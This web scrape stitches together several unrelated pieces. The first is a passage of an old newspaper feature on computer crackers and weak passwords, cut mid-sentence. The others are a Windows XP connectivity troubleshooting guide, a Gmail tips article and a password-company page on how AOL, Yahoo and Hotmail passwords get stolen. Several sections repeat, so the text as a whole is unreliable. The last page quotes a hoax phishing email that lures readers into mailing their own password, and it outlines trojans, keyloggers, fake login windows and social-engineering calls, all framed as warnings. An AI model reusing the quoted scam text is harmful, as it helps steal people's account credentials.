interesting to crackers. Instead, they target mainframes and minicomputers that support many users and are connected to telephone lines and large networks. Understanding how crackers work and what security weaknesses they exploit can help system managers prevent many break-ins, Brand said. And the biggest problem is carelessness. "When I started looking at break-ins, I had the assumption that technical problems were at fault," he said. "But the problem is human beings." The "Cracker": Most crackers are not bent on stealing either money or secrets but will target a particular computer for entry because of the bragging rights they will enjoy with fellow crackers once they prove they broke in. Typically, the computer belongs to a corporation or the government and is considered in cracking circles to be hard to penetrate. Often, it is connected to the nationwide NSFNet computer network. The attack: Crackers can attack the target computer from home, using a modem and a telephone line. Or they can visit a publicly accessible terminal room, like one on a college campus, using the school's computer to attack the target through a network. At home, the cracker works undisturbed and unseen for hours, but phone calls might be traced. The resources: If the target computer is nearby, the cracker may look through the owner's trash for valuable information, a practice called "dumpster diving." Discarded printouts, manuals or other paper may contain lists of accounts, some passwords, or technical data more sophisticated crackers can exploit. The target: The easiest way to enter the target is with an account name and its password. Passwords are often the weakest link in a computer's security system: Many are easy to guess, and some accounts have no password at all. Sophisticated crackers use their personal computers to quickly try thousands of potential passwords for a match. The cover: To make calls from home harder to trace, crackers might use stolen telephone credit-card numbers to place a series of calls through different long-distance carriers or corporate switchboards before calling the target computer's modem. The way in: Many crackers take advantage of "holes" in the operating system, the software that controls the basic operations of the machine. The holes are like secret doors that either let crackers make their own "super" accounts or just bypass accounts and passwords altogether. Five holes in the Unix operating system account for the bulk of computer break-ins--yet many installations have failed to patch them. The network: Most large computers are connected to several others through networks, a chief point of attack. Computers erect barriers to people but often completely trust other computers, so attacking a computer through another computer on the network can be easier than attacking it with a personal computer and a modem. Ill-used passwords let many pass Passwords are the security linchpin for most computer systems. But these supposedly secret keys to computer access are easily obtained by a determined cracker. The main reason: Users and system managers often are so careless with passwords that they are as easy to find as a door key left under the welcome mat. Part of the problem is the proliferation of computers and computerlike devices such as automated teller machines, all of which require passwords or personal identification numbers. Many people must now remember half a dozen or more such secret codes, encouraging them to make each one short and simple. Often, that means making their passwords the same as their account name, which in turn is often the user's own first or last name. Such identical combinations are called "Joe" accounts, and according to computer expert Russell L. Brand, they are "the single most common cause of password problems in the world." These `secret' keys to computer access are easily obtained by a determined cracker. The main reason: Users and system managers often are so careless with passwords that they are as easy to find as a key left under the welcome mat. Knowing there are Joes, a cracker can simply try a few dozen common English names with a reasonable chance that one will work. Armed with an easily obtained company directory of employees, the task can be even easier. Joe accounts also crop up when the system manager creates an account for a new employee, expecting that the user will immediately change the given password from his or her name to something else. But users often fail to make the change or aren't told how. Sometimes, they never use the account at all, providing not only easy access for the cracker but an account where the owner won't notice any illicit activity. Even if crackers can't find a "Joe" on the computer they want to enter, there are several other common ways for them to find a password that will work: - Many systems have accounts with no passwords or have accounts for occasional visitors to use where the ID and password are both GUEST. - Outdated operator's manuals retrieved from the trash often list the account name and standard password provided by the operating system for use by maintenance programmers. Although it can and should be changed, the password seldom is. - "Social engineering"--in effect, persuading someone, usually by telephone, to divulge account names, passwords or both--is a common ploy used by crackers. - Crackers are sometimes able to obtain an encrypted list of passwords for a target computer, discarded by the owners who mistakenly believe the coded words aren't useful to crackers. While it's true they are difficult to decode, it is easy for a cracker to use a personal computer to take a potential password and encode it. Because most passwords are ordinary English words, crackers can simply run a personal computer program to encode the contents of an electronic dictionary and identify any entries that match passwords on the coded list. - In another form of deception, crackers set up public bulletin board systems whose real purpose is to snag passwords. Because many people tend to use the same password for all their computer accounts, the cracker can simply wait until someone who has an account on the target computer also sets up an account on the bulletin board. The cracker then reads the password and tries it on the target system. While individual users can't delete dormant accounts from their computers or keep an eye on the trash, they can be intelligent about what passwords they use. Brand suggests users choose a short phrase that's easy for them to remember and then use the first two letters of each word as the password. As added protection, users who are able should mix uppercase and lowercase letters in their passwords or use a punctuation mark in the middle of the word.--Rory J. O'Connor The rights of bits Constitutional scholar Laurence H. Tribe, widely considered the first choice for any Supreme Court vacancy that might arise under a Democratic administration, proposed a fairly radical idea recently: a constitutional amendment covering computers. Tribe's proposal for a 27th Amendment would specifically extend First and Fourth Amendment protections to the rapidly growing and increasingly pervasive universe of computing. Those rights would be "construed as fully applicable without regard to the technological method or medium through which information content is generated, stored, altered, transmitted or controlled," in the words of the proposed amendment. I am not a constitutional scholar, but I have to believe that what's needed is not a change in the Constitution, but instead a change in the thinking of judges in particular and the public in general. Tribe acknowledges that he doesn't take amendments lightly, pointing to the ridiculous brouhaha over a flag-burning amendment as an example of what not to do to the basic law of the land. But like many people who are more deeply involved in the world of computers, Tribe sees the issue of civil liberties in an information society as a crucial one. The question is not whether the civil liberties issue is serious enough to be addressed by some fundamental legal change. The question is really how to get people to see that communicating with a computer is speech, and that to search a computer and seize data is the same as searching a house and seizing the contents of my filing cabinet. People seem to have trouble making these connections when computers are involved, even though they wouldn't have trouble recognizing a private telephone conversation as protected speech. Yet most telephone calls in this country are, at some time in their transmission, nothing more than a stream of computer bits traveling between sophisticated computers. Admittedly, computers do make for some complications where things like search and seizure are concerned. Let's say the FBI gets a search warrant for a computer bulletin board, looking for a specific set of messages about an illegal drug business. Because a single hard disk drive on a bulletin board system can contain thousands of messages from different users, the normal method for police will be to take the whole disk, and probably the computer as well, back to the lab to look for the suspect messages. Of course, that exposes other, supposedly confidential messages to police scrutiny. It also interrupts the legitimate operation of what is, in effect, an electronic printing press. Certainly, in the case of a real printing press that used paper, such police activity would never be allowed. But a computer is involved here, which to some appears to make the existing rules inapplicable. But in a case like this, we don't need a new amendment, just the proper application of the Bill of Rights. As a more practical matter, the chances of amending the Constitution are slight. It was the intent of the framers to make the task difficult, to prevent just such trivial things as flag-burning amendments from being tacked onto the document. Even the far more substantial Equal Rights Amendment did not survive the rocky road from proposal to adoption. I doubt Tribe's
Connectivity Issues
If your having problems connecting to the internet here are some troubleshooting tips to help solve your internet connectivity issues. Please note that this article is written for Windows XP, but can be applied other operating systems. Be sure to pay attention to your computer and the steps it goes through when accessing the internet. Watch the small icon on your quick launch bar in the far right corner of your screen to see where it may be running into a problem. If you hold your mouse over the icon it should relay what part of the process it is currently working on or state of your connectivity. Also be aware of the icons and what they mean. If you are not connected there will be a small red x over the icon, and if there is some issues with your connectivity there may be a yellow triangle with an exclamation mark on it.
Establish a Connection:
First establish your internet is working and that all your cords are snapped in securely into place. Most problems occur between the router and the computer, so check to see if your internet connection is simply out first. Also be sure to check on the settings of your firewall. If you just installed one and haven’t allowed correct program access that may be the problem. If you suspect its your firewall disabled it to test out your connection if its not be sure to turn it back on.
Modem to computer:
* Unplug both router and modem* Connect your computer directly into the modem* Restart your computer* If your internet connection works then it is an issue between your router computer and modem.
Power Cycling:
Many times power cycling will solve your problem. You can also try resetting your modem and your router. If you have wireless security setup make sure you enable it again if you restart your router.
* Power down both router and modem* Plug modem back in wait until all lights are flashing correctly. Make sure not to skip this step, the modem needs to be able to recognize all ports connected to it.* Power router back on* Restart your computer
Checking and repairing your status via Network Connections:
If your on windows xp go to Start > Control Panel > Network Connections. From here you can view the current status’s of your internet connection. There may be many icons depending on if you have a wireless card or adapter hooked up to your computer. If your using a wired connection then you want to pay attention to the Local Area Connection icon. If your using a wireless connection then you want to focus on the Wireless Network Connection icon.
* Ensure your connections are not disabled, you can right click the icon to enable disabled connections.
* Right click and drop down to repair to see if it can fix your issue. Many times it will tell you a more specific error such as an ip conflict, or it will say: “Windows finished repairing your connection. You can try connecting again. If the problem persists, contact the person who manages your network.” This is an all clear sign that windows cannot detect a problem and your connection should be fine. Of course this isn’t always the case.
Ipconfig:
Another good way to see if your connected at all is ipconfig. To check ipconfig go to Start > Run > and type in cmd. This will open command prompt, then type in ipconfig. Become familiar with this while troubleshooting as it can help you isolate issues in the future. Ipconfig will show you your ip address, subnet mask and default gateway if your computer is receiving any. Your ipaddress is from your modem and generally if it shows up your getting a signal from your modem to your computer. If only your subnet mask shows up and the rest are 0.0.0.0 then there is no internet signal coming through your modem and you only have a connection to your router.
Limited or No Connectivity:
One of the most common, and sometimes the most frustrating annoyances of not being able to access the internet is the limited or no connectivity sign. If you just upgraded to service pack 2 are experiencing the limited or no connectivity error you can try downloading this patch from Microsoft.
* Releasing and renewing your DHCP via your router. Your computer to have to access your routers settings via your web browser if your not sure how to do this check with your routers hompage. With linksys I connect via the default gateway listed in ipconfig above. Example default gateway: 192.168.1.1. So in your browser type in http://192.168.1.1 it will ask for your password it varies from router to router try typing admin in either the username or only the password. If your not sure contact your routers customer support. On my Linksys the buttons to release and renew your DHCP is found under 'status'.
* Assign your own ip. While not recommended unless you’re an advanced user you can assign yourself an ipaddress if there happens to be an ip conflict in your system. Right click on your active internet connection via network connection drop down to repair. On the general tab highlight Internet Protocol (TCP/IP) and click properties. By default it should obtain an ip address automatically. From here you can specify your own ip address that another computer on your network may not be using. Generally it follows a code of Default Gateway: 192.168.1.1 Ip Address: 192.168.1.100 for one computer 192.168.1.102 for another computer and so on. Try to keep in line just add one close to it such as 192.168.1.105.
* Try resetting your winsock settings. Start > Run > cmd then type in winsock reset.
Other Tips:
If you just reinstalled your operating system, be sure to check to see if the drivers for your network device is correct. Start > right click My Computer > Hardware > Device Manager. From here you can view what you have update, or go to your computer manufacture’s homepage to see if there are any updated drivers. If your unable to connect on your computer you can download the updates to a cd rom or flash drive and transfer it to your computer.
If your using an adapter make sure that the signal and your adapter are on the same wavelength. For example; I had a wireless G adapter picking up a signal from a wireless B router. Even though it worked for a while it stopped working because they are actually broadcasting and receiving on different frequencies. Check your router and adapter for more information. Sometimes the newer versions broadcast on different frequencies to cover the bases, while the older models may just broadcast in one.
Don't forget to have a good and active security system on your computer including a firewall anti-virus and spyware scanners. Malware issues can also interfere with your computers connectivity.
Establish a Connection:
First establish your internet is working and that all your cords are snapped in securely into place. Most problems occur between the router and the computer, so check to see if your internet connection is simply out first. Also be sure to check on the settings of your firewall. If you just installed one and haven’t allowed correct program access that may be the problem. If you suspect its your firewall disabled it to test out your connection if its not be sure to turn it back on.
Modem to computer:
* Unplug both router and modem* Connect your computer directly into the modem* Restart your computer* If your internet connection works then it is an issue between your router computer and modem.
Power Cycling:
Many times power cycling will solve your problem. You can also try resetting your modem and your router. If you have wireless security setup make sure you enable it again if you restart your router.
* Power down both router and modem* Plug modem back in wait until all lights are flashing correctly. Make sure not to skip this step, the modem needs to be able to recognize all ports connected to it.* Power router back on* Restart your computer
Checking and repairing your status via Network Connections:
If your on windows xp go to Start > Control Panel > Network Connections. From here you can view the current status’s of your internet connection. There may be many icons depending on if you have a wireless card or adapter hooked up to your computer. If your using a wired connection then you want to pay attention to the Local Area Connection icon. If your using a wireless connection then you want to focus on the Wireless Network Connection icon.
* Ensure your connections are not disabled, you can right click the icon to enable disabled connections.
* Right click and drop down to repair to see if it can fix your issue. Many times it will tell you a more specific error such as an ip conflict, or it will say: “Windows finished repairing your connection. You can try connecting again. If the problem persists, contact the person who manages your network.” This is an all clear sign that windows cannot detect a problem and your connection should be fine. Of course this isn’t always the case.
Ipconfig:
Another good way to see if your connected at all is ipconfig. To check ipconfig go to Start > Run > and type in cmd. This will open command prompt, then type in ipconfig. Become familiar with this while troubleshooting as it can help you isolate issues in the future. Ipconfig will show you your ip address, subnet mask and default gateway if your computer is receiving any. Your ipaddress is from your modem and generally if it shows up your getting a signal from your modem to your computer. If only your subnet mask shows up and the rest are 0.0.0.0 then there is no internet signal coming through your modem and you only have a connection to your router.
Limited or No Connectivity:
One of the most common, and sometimes the most frustrating annoyances of not being able to access the internet is the limited or no connectivity sign. If you just upgraded to service pack 2 are experiencing the limited or no connectivity error you can try downloading this patch from Microsoft.
* Releasing and renewing your DHCP via your router. Your computer to have to access your routers settings via your web browser if your not sure how to do this check with your routers hompage. With linksys I connect via the default gateway listed in ipconfig above. Example default gateway: 192.168.1.1. So in your browser type in http://192.168.1.1 it will ask for your password it varies from router to router try typing admin in either the username or only the password. If your not sure contact your routers customer support. On my Linksys the buttons to release and renew your DHCP is found under 'status'.
* Assign your own ip. While not recommended unless you’re an advanced user you can assign yourself an ipaddress if there happens to be an ip conflict in your system. Right click on your active internet connection via network connection drop down to repair. On the general tab highlight Internet Protocol (TCP/IP) and click properties. By default it should obtain an ip address automatically. From here you can specify your own ip address that another computer on your network may not be using. Generally it follows a code of Default Gateway: 192.168.1.1 Ip Address: 192.168.1.100 for one computer 192.168.1.102 for another computer and so on. Try to keep in line just add one close to it such as 192.168.1.105.
* Try resetting your winsock settings. Start > Run > cmd then type in winsock reset.
Other Tips:
If you just reinstalled your operating system, be sure to check to see if the drivers for your network device is correct. Start > right click My Computer > Hardware > Device Manager. From here you can view what you have update, or go to your computer manufacture’s homepage to see if there are any updated drivers. If your unable to connect on your computer you can download the updates to a cd rom or flash drive and transfer it to your computer.
If your using an adapter make sure that the signal and your adapter are on the same wavelength. For example; I had a wireless G adapter picking up a signal from a wireless B router. Even though it worked for a while it stopped working because they are actually broadcasting and receiving on different frequencies. Check your router and adapter for more information. Sometimes the newer versions broadcast on different frequencies to cover the bases, while the older models may just broadcast in one.
Don't forget to have a good and active security system on your computer including a firewall anti-virus and spyware scanners. Malware issues can also interfere with your computers connectivity.
How To: Hack Gmail
Tired of stingy ISPs imposing arbitrary email restrictions on you? Yeah, so are we. 1MB attachment limits, 25MB storage limits, and restricted SMTP servers are sooo 1997. For a 21st-Century mail experience, step up to Gmail.
We know what you’re thinking: Webmail is webmail. But with 2.7GB of storage, 10MB attachment allowances, and an array of easy hacks that let you customize your mail account in almost any way you like, Gmail may be the most powerful e-mail tool the world has ever known. But enough of our yammering. Here’s how to turn your Gmail account into a messaging dynamo, and more.
1. Use Gmail as an Online Storage VaultNeed to keep important files handy? You don’t necessarily have to shell out 100 bucks for a high-capacity thumb drive. Instead, use Gmail’s free 2.7GB of storage as an off-site backup for the files you need access to. The easiest way is to simply attach your file to an email and shoot it to your Gmail account. Then you can retrieve it at any time just by logging in and running a quick search of your inbox. Of course, Gmail’s 10MB attachment limit means you won’t be able to archive massive documents. But it’s a great way keep your most essential files handy wherever there’s an Internet connection.
To take even greater advantage of Gmail’s free storage space, you’ll need to download a helper app. Firefox users can download Gmail Space from Mozilla’s Firefox Add-ons library, which turns the web browser into an easy-to-use file explorer. The extension lets you drag and drop files directly into Gmail’s storage space, without having to worry about the attachment size limit.
Alternatively, you can download Gmail Drive Shell Extension (free) for more ubiquitous access throughout your Windows PC. Gmail Drive Shell Extension sets up your Gmail storage space as a network drive on your PC, which you can access simply by double-clicking the GMail Drive icon in My Computer and then entering your Gmail username and password. Once you log in, your Gmail storage will act just like any other drive on your PC. It even works with Windows Vista.
2. Filter Your Mail with Positive ThinkingThe lowly plus sign gets little respect in this crazy, mixed-up world. But if you use it the right way with Gmail, it could become your new best friend. By adding a plus sign and a filter tag to your own Gmail address, you can figure out which of the sites that you’ve brazenly given your address to are turning around, stabbing you in your tender, fleshy backside, and selling it to every half-witted Pr0p3cia spammer on the net.
This little hack doesn’t require a single tweak to your Gmail settings. Instead, just use the plus/tag every time you enter your address into an online form. Our favorite method is to use the name of the site you’re visiting as the tag, so it’s easy to track later on. So if you buy some vintage kicks at Raresneakers.com, enter your email address as username+raresneakers@gmail.com.
Gmail ignores the plus sign and everything that comes after it, so messages sent to that address will still make their way to you. But if that site sells your address to its spamifying associates, you’ll know just by peeking at the To address in the header. How you choose to exact revenge is entirely up to you.
You can also use this tip to set up filters for registration codes, listservs, and anything else!
3. Take Notice with a NotifierYou don’t have to log into Gmail every time you want to see if you’ve got mail. Instead, download a Gmail notifier. Although it isn’t prominently featured on the Gmail site, Google’s own Gmail Notifier is a free download. If you’d rather not install a system tray icon, you can always use a Gmail plugin for Firefox. Gmail Checker is a low-profile plugin that requires barely a second thought to keep track of. But if you want to check multiple Gmail accounts from within Firefox, check out Gmail Manager.
4. Import Your Old Mail into GmailIf you decide to switch to Gmail completely, you’ll probably want to bring your old contacts and messages along for the ride. Importing your contacts is easy (just click Import in the upper-right corner of the Contacts screen and select a CSV file exported from your old mail app). Importing your old email takes a little more doing.
One of the easiest ways to get your old mail into Gmail is to download Mark Lyon’s Gmail Loader (aka GML), which you can download from www.marklyon.org/gmail/. This simple little utility will transfer messages in the mBox format (including Thunderbird, Eudora, and Netscape mailboxes) into Gmail. Transferring your mail is as easy as downloading the app, launching it, entering your Gmail login info, browsing for your mailbox folder, and clicking Send to Gmail.
To transfer Outlook mailboxes, try Outport, which can transfer messages from Outlook to a host of other mail readers, including Gmail. Like GML, Outport has a fairly simple GUI that’s easy to navigate, so you can get the job done quickly and with a minimum of mucking around.
Sadly, Gmail will stamp all the imported mail with the date on which you do the import, rather than preserve the original received dates from each of your imported messages. However, you can still find imported messages by date, because the original received dates are retained within the body of the messages. So simply searching for “Nov 06” will help you find all messages from November of 2006.
5. Turn Gmail into an MP3 PlayerIn the interest of convenience, Gmail has its own built-in audio player for use with file attachments. You can put it to work as an online MP3 player by using labels and mail filters to sort your files.
First, set up a label called MP3. Next, set up a filter that searches for MP3 content by clicking Create a Filter at the top of the screen. Enter “mp3” in the “Has the words” field and check the box marked “Has attachment.” This will search for any messages with music files attached (including any you may have uploaded using the GMail Drive Shell Extension mentioned earlier). Now click Next Step and check the box marked “Apply the label” and choose the label MP3. Now any time you want to pump up some jams, you can click the MP3 label on the left side of your screen and pick a tune from the list.
6. Email ImpersonatorJust because you’ve switched to Gmail, that doesn’t mean you have to give up your old email address. Gmail lets you send messages that appear to come from another address. In the settings pane, click Accounts and then choose “Add another email address,” then enter the address you’d like to use. To prevent you from ruining someone else’s life by masquerading as them on the Internet, Google will send a test message to verify that the address belongs to you. Then you can choose to make that new address your default identity, so nobody needs to know that you’re really sending from Gmail. To complete the transformation, set up a forwarder for your other address’s account, so that all of your mail reaches your Gmail account
We know what you’re thinking: Webmail is webmail. But with 2.7GB of storage, 10MB attachment allowances, and an array of easy hacks that let you customize your mail account in almost any way you like, Gmail may be the most powerful e-mail tool the world has ever known. But enough of our yammering. Here’s how to turn your Gmail account into a messaging dynamo, and more.
1. Use Gmail as an Online Storage VaultNeed to keep important files handy? You don’t necessarily have to shell out 100 bucks for a high-capacity thumb drive. Instead, use Gmail’s free 2.7GB of storage as an off-site backup for the files you need access to. The easiest way is to simply attach your file to an email and shoot it to your Gmail account. Then you can retrieve it at any time just by logging in and running a quick search of your inbox. Of course, Gmail’s 10MB attachment limit means you won’t be able to archive massive documents. But it’s a great way keep your most essential files handy wherever there’s an Internet connection.
To take even greater advantage of Gmail’s free storage space, you’ll need to download a helper app. Firefox users can download Gmail Space from Mozilla’s Firefox Add-ons library, which turns the web browser into an easy-to-use file explorer. The extension lets you drag and drop files directly into Gmail’s storage space, without having to worry about the attachment size limit.
Alternatively, you can download Gmail Drive Shell Extension (free) for more ubiquitous access throughout your Windows PC. Gmail Drive Shell Extension sets up your Gmail storage space as a network drive on your PC, which you can access simply by double-clicking the GMail Drive icon in My Computer and then entering your Gmail username and password. Once you log in, your Gmail storage will act just like any other drive on your PC. It even works with Windows Vista.
2. Filter Your Mail with Positive ThinkingThe lowly plus sign gets little respect in this crazy, mixed-up world. But if you use it the right way with Gmail, it could become your new best friend. By adding a plus sign and a filter tag to your own Gmail address, you can figure out which of the sites that you’ve brazenly given your address to are turning around, stabbing you in your tender, fleshy backside, and selling it to every half-witted Pr0p3cia spammer on the net.
This little hack doesn’t require a single tweak to your Gmail settings. Instead, just use the plus/tag every time you enter your address into an online form. Our favorite method is to use the name of the site you’re visiting as the tag, so it’s easy to track later on. So if you buy some vintage kicks at Raresneakers.com, enter your email address as username+raresneakers@gmail.com.
Gmail ignores the plus sign and everything that comes after it, so messages sent to that address will still make their way to you. But if that site sells your address to its spamifying associates, you’ll know just by peeking at the To address in the header. How you choose to exact revenge is entirely up to you.
You can also use this tip to set up filters for registration codes, listservs, and anything else!
3. Take Notice with a NotifierYou don’t have to log into Gmail every time you want to see if you’ve got mail. Instead, download a Gmail notifier. Although it isn’t prominently featured on the Gmail site, Google’s own Gmail Notifier is a free download. If you’d rather not install a system tray icon, you can always use a Gmail plugin for Firefox. Gmail Checker is a low-profile plugin that requires barely a second thought to keep track of. But if you want to check multiple Gmail accounts from within Firefox, check out Gmail Manager.
4. Import Your Old Mail into GmailIf you decide to switch to Gmail completely, you’ll probably want to bring your old contacts and messages along for the ride. Importing your contacts is easy (just click Import in the upper-right corner of the Contacts screen and select a CSV file exported from your old mail app). Importing your old email takes a little more doing.
One of the easiest ways to get your old mail into Gmail is to download Mark Lyon’s Gmail Loader (aka GML), which you can download from www.marklyon.org/gmail/. This simple little utility will transfer messages in the mBox format (including Thunderbird, Eudora, and Netscape mailboxes) into Gmail. Transferring your mail is as easy as downloading the app, launching it, entering your Gmail login info, browsing for your mailbox folder, and clicking Send to Gmail.
To transfer Outlook mailboxes, try Outport, which can transfer messages from Outlook to a host of other mail readers, including Gmail. Like GML, Outport has a fairly simple GUI that’s easy to navigate, so you can get the job done quickly and with a minimum of mucking around.
Sadly, Gmail will stamp all the imported mail with the date on which you do the import, rather than preserve the original received dates from each of your imported messages. However, you can still find imported messages by date, because the original received dates are retained within the body of the messages. So simply searching for “Nov 06” will help you find all messages from November of 2006.
5. Turn Gmail into an MP3 PlayerIn the interest of convenience, Gmail has its own built-in audio player for use with file attachments. You can put it to work as an online MP3 player by using labels and mail filters to sort your files.
First, set up a label called MP3. Next, set up a filter that searches for MP3 content by clicking Create a Filter at the top of the screen. Enter “mp3” in the “Has the words” field and check the box marked “Has attachment.” This will search for any messages with music files attached (including any you may have uploaded using the GMail Drive Shell Extension mentioned earlier). Now click Next Step and check the box marked “Apply the label” and choose the label MP3. Now any time you want to pump up some jams, you can click the MP3 label on the left side of your screen and pick a tune from the list.
6. Email ImpersonatorJust because you’ve switched to Gmail, that doesn’t mean you have to give up your old email address. Gmail lets you send messages that appear to come from another address. In the settings pane, click Accounts and then choose “Add another email address,” then enter the address you’d like to use. To prevent you from ruining someone else’s life by masquerading as them on the Internet, Google will send a test message to verify that the address belongs to you. Then you can choose to make that new address your default identity, so nobody needs to know that you’re really sending from Gmail. To complete the transformation, set up a forwarder for your other address’s account, so that all of your mail reaches your Gmail account
HOW TO HACK AOL®, YAHOO® AND HOTMAIL®
We get numerous calls from people who want to recover AOL®, Yahoo® or Hotmail® or other online and email passwords. We do not do this type of work. Many of these people claim that they have lost their passwords because they have been hacked and now need to get their password back. As we have reviewed information on the web, we found very little real information about the actual techniques that could be used to hack these services. So we decided to pull together a detailed explanation.
What follows is a detailed explanation of the methodologies involved. We do not condone any illegal activity and we clearly mention in this article techniques that are illegal. Sometimes these methods are known as "Phishing."
THE HOAX
Let's dispose of one technique that is absolutely a hoax (meaning a fraud: something intended to deceive; deliberate trickery intended to gain an advantage.) If you see a newsgroup post or web page with something like the following, it is a hoax and will not work.
: : : (([[THIS REALLY WORKS ]])) : : :
(1) send an E-mail to passwordrecovery@yourdomainhere.com
(2) In the subject box type the screenname of the person whose password you wish to steal
(3) In the message box type the following: /cgi-bin/start?v703&login.USER=passmachine&class=supervisor&f={your aol password}&f=27586&javascript=ACTIVE&rsa
(4) Send the e-mail with priority set to "high" (red ! in some mailprograms)
(5) wait 2-3 minutes and check your mail
(6) Read the message.-Where YOUR password was typed before, NOW, the password of the screenname in the code string is there!!!
Why does this work? It´s a special decryption-server that AOL-employees can use to decrypt passwords.The aolbackdoor account is a bot that reads your authentification from the message body and identifiying you as a valid AOL Staff-member, you will get the password mailed back to you. The trick is that this Bot´s script seems to be a little bit buggy and it automatically recogises you as an supervisor (AOL-Staff member), even if you use a normal AOL account. This means, that EVERYONE having a valid AOL account can hack as many other accounts as he wants.
This is just a scam to steal your password and may explain some of the calls we get from people saying they were hacked. Never give your password to anyone. No legitimate web service or customer service representative will ask for it or need it. There is no magic email address or series of commands that will reveal the passwords of users.
LOCALLY STORED PASSWORDS
Most browsers, including Internet Explorer® and Netscape®, the AOL® client, and Windows® Dial-Up Connections allow you the option to store passwords. These passwords are stored on the local machine and (depending upon where and how it is stored) there is usually a method of recovering these passwords. Storing any password locally is insecure and may allow the password to be recovered by anyone who has access to the local machine. While we are not currently aware of any program to recover locally stored AOL® passwords, we do not recommend that these are secure. Software does exist that can recover most of the other types of locally stored passwords.
TROJAN
A Trojan is a program that is sent to a user that allows an attacker to control functions of the target computer, recover information from the target or to delete or damage files on the target. The name Trojan is given because the program will usually come attached to some other program or file that entices you to run it. There are a wide variety of Trojans any number of which can be programmed to capture passwords as they are typed and to email or transmit them to a third party. To protect yourself against Trojans, you should never execute or download software or files that are not from a trusted source. It is critical that anyone working on internet use a virus protection program (which should catch most Trojans.) Note that since a Trojan requires the password to be typed or stored in order to be recovered, this is not an effective way to recover your own password. It could explain, however, how someone could lose their password to a hacker. Sending someone a Trojan program is certainly illegal and we do not recommend or condone this activity. A Trojan is unlikely to be effective in recovering a particular account password since it requires the target to install it. However, hackers will often bulk mail Trojans to thousands of people in the hope that a small percentage will get caught. Legitimate account holders who may have been caught by a Trojan and can authenticate themselves should contact their service provider to have their account passwords reset.
KEYLOGGER
A keylogger is a program or piece of hardware that records all keyboard keystrokes to an encrypted file which can then be read later. Based on the order of the keystrokes, it is usually easy to identify the password(s) from the file later. Like the Trojan, this also requires that someone actually type the password. Keyloggers come in two types: hardware and software. A hardware keylogger can be fitted between the keyboard cable and the computer and can be activated with a few keystrokes. It is then left in place until after the password that you are looking to recover is typed. Later it is removed and the file of keystrokes is examined for the password. A hardware keylogger is undectable by anti-virus software. A software keylogger is installed on a system and effectively has the same function, however, it is a little bit more complex to use since it must be installed to run stealthily to be effective. A keylogger could be used to steal a password from someone who is using an office computer or sharing a computer. It is possible that installing and using such a device or piece of software could be illegal depending upon whether the target has a presumption of privacy when using the computer on which the keylogger is installed.
IMPERSONATION
It is possible to impersonate a program on a computer by launching windows that look like something else. For instance, let's say you login to the MSN® service and visit a website (in this case a hostile website.) It would be possible for this website to pop-up some windows that look like something else. They could look almost identical to windows that an inexperienced user might expect from his local computer. The user could be fooled into submitting information to the hostile website. For instance, consider the effect of seeing the following series of windows:
If these could trick you into entering your password, then you could end-up sending your password to the attacker. Windows such as these could be created to mirror virtually any program or series of actions. Your browser will likely identify your operating system and your IP address might identify your ISP. Therefore, a hostile website could target you with a series of screen shots that look exactly as they should on your system. The key is that the screen shots are not coming from your system, but are coming from the hostile website. First, creating such a hostile website is probably fraudulent and illegal. We do not recommend or condone this activity. To protect yourself against this type of attack, make sure to configure your browser for high security and enable warnings for any code that is executed on your system.
SNIFFING
If two people do not share the same computer, but do share the same network, it may be possible for one to sniff the others' packets as they sign-on. The traffic between your computer and the internet site you are accessing may be able to be recorded and decrypted or "played-back." This is not a simple attack to execute, but is possible if two people are close to one another and share a hub. Again, this is likely to be illegal and we do not condone this activity.
BRUTE-FORCE ATTACK
Many people want to find software to perform a brute-force attack. This is really impractical. It would take hundreds of thousands of years to attempt any kind of reasonable brute-force attack on AOL®, Yahoo® or Hotmail® and this would expand exponentially if the password is longer than the minimum length. Using multiple computers or multiple sessions could reduce this to merely thousands of years. This is highly illegal since these services own the servers on which an account is hosted. Even if you are hacking your own account, you don't own the servers and the service is going to monitor and log this activity. It is extremely unlikely that you could recover a password in this way, but it is extremely likely that you'd be arrested and prosecuted for doing this.
SOCIAL ENGINEERING
Social engineering is the name given to the art of attacking the person, rather than the computer or system. The basic principle is that many people can be talked into giving someone else their id and password if they think it is someone that they can trust. For instance, I might call someone and say I was from AOL and that I was finally getting around to responding to their technical support question. I would then ask you to describe the problem that you are having and tell you that we have a solution. However, I just need to verify the account. Can you give me the username and password again? A surprising number of people would fall for this obvious scam. There is no limit as to how elaborate this can be. The more information that is given by the caller, the more realistic or believable the call is. Again, never give your password to anyone. No legitimate customer service representative will ask for this information.
These are the basic methods that we are aware of for hacking an AOL®, Yahoo®, Hotmail® or any other dial-up or on-line password. Hopefully this will answer some questions and help you protect yourself against these attacks.
Password Crackers, Inc. does offer an America Online (AOL)® Personal Filing Cabinet (.pfc) conversion service. We can convert AOL® Personal Filing Cabinets (.pfc) to either Netscape®, Microsoft Outlook® (.pst) or text (.txt) formats. You can get more information about this service here.
What follows is a detailed explanation of the methodologies involved. We do not condone any illegal activity and we clearly mention in this article techniques that are illegal. Sometimes these methods are known as "Phishing."
THE HOAX
Let's dispose of one technique that is absolutely a hoax (meaning a fraud: something intended to deceive; deliberate trickery intended to gain an advantage.) If you see a newsgroup post or web page with something like the following, it is a hoax and will not work.
: : : (([[THIS REALLY WORKS ]])) : : :
(1) send an E-mail to passwordrecovery@yourdomainhere.com
(2) In the subject box type the screenname of the person whose password you wish to steal
(3) In the message box type the following: /cgi-bin/start?v703&login.USER=passmachine&class=supervisor&f={your aol password}&f=27586&javascript=ACTIVE&rsa
(4) Send the e-mail with priority set to "high" (red ! in some mailprograms)
(5) wait 2-3 minutes and check your mail
(6) Read the message.-Where YOUR password was typed before, NOW, the password of the screenname in the code string is there!!!
Why does this work? It´s a special decryption-server that AOL-employees can use to decrypt passwords.The aolbackdoor account is a bot that reads your authentification from the message body and identifiying you as a valid AOL Staff-member, you will get the password mailed back to you. The trick is that this Bot´s script seems to be a little bit buggy and it automatically recogises you as an supervisor (AOL-Staff member), even if you use a normal AOL account. This means, that EVERYONE having a valid AOL account can hack as many other accounts as he wants.
This is just a scam to steal your password and may explain some of the calls we get from people saying they were hacked. Never give your password to anyone. No legitimate web service or customer service representative will ask for it or need it. There is no magic email address or series of commands that will reveal the passwords of users.
LOCALLY STORED PASSWORDS
